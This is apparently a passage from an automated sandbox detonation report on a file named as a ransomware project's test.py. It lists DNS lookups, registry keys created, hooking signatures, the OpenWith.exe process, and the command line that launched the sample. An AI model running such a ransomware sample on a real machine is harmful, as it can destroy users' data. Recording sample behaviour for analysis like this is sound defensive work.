US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 71.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 67.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 104.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-11-28 22:38

Reported

2024-11-28 22:40

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

147s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Ransomware-master\test.py

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A